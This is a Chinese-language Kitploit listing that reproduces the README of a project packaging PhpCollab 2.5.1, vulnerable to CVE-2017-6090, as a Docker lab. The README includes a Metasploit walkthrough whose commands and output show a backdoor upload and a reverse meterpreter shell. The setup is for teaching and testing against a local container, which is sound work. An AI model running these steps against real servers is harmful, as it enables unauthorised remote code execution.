Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
exploit-CVE-2017-6090 — 容器化的可利用 PhpCollab | Kitploit
工具/GitHubGitHub/jlk/exploit-cve-2017-6090
容器安全漏洞利用框架漏洞分析Web应用程序漏洞利用渗透测试学习与教育
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

容器化的可利用 PhpCollab

查看仓库
158年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

容器化的可利用CVE-2017-6090

Docker Pulls License

本项目构建了一个运行 PhpCollab 2.5.1 的容器,其中包含 CVE-2017-6090 中详述的远程代码执行漏洞。此外,还提供了一个 docker-compose 文件,用于启动该容器和 MySQL 以演示该漏洞,利用说明如下。

构建

docker build -t 容器名称 . 或使用镜像 jlkinsel/exploit-cve-2017-6090

运行与配置

启动该程序最简单的方法是使用附带的 docker-compose.yml 文件。如果我有空——或者有人感兴趣——我会创建一个 Kubernetes 部署或 Helm chart。

因此,启动方法如下:

root@kitploit:~
docker-compose up

到目前为止一切顺利!现在,phpcollab 需要配置为使用数据库,并设置默认管理员密码。我曾(简短地)尝试自动执行此操作,但是……好吧……你看起来会用浏览器……

  • 浏览到 http://localhost:8088
  • 滚动到 GPL 底部,勾选“离线安装”框,然后点击步骤2
  • 在字段中输入以下数据,然后点击保存:
字段值
数据库服务器mysql
数据库登录名phpcollab
数据库密码changeme
数据库名称phpcollab
通知False
管理员密码changeme(或你想要的任何密码)

最后,你可以登录并进行查看,但对利用来说不是必需的。

注意

请注意,此 Docker Compose 配置没有对存储做任何特殊处理。如果你希望持久化 MySQL 数据库,则必须在 docker-compose.yml 的 mysql 服务定义中添加卷定义。请参见 mariadb Docker Hub 页面 上的示例。

利用

首先——按照上面的运行与配置步骤启动应用程序。

我没有在此项目中包含利用代码,因为……嗯,Metasploit 已经有了。

不熟悉 MSF?以下是对我们刚启动的容器进行利用的快速概述:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

这需要几分钟来启动。remnux/metasploit Docker Hub 页面介绍了如何使用卷,以便将来启动不会花费这么长时间。但我们马上就要开始了!

一旦获得 shell 提示符,我们继续:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

此时,你已经进入内部,游戏可以开始了。

注意

如果此目录的名称不是 "exploit-CVE-2017-6090",则必须修改上面的 --network 命令。

另外——我们在 msfconsole 中将远程端口设置为 80,尽管外部端口是 8088。Metasploit 容器与 phpcollab 容器在同一网络内。

下载工具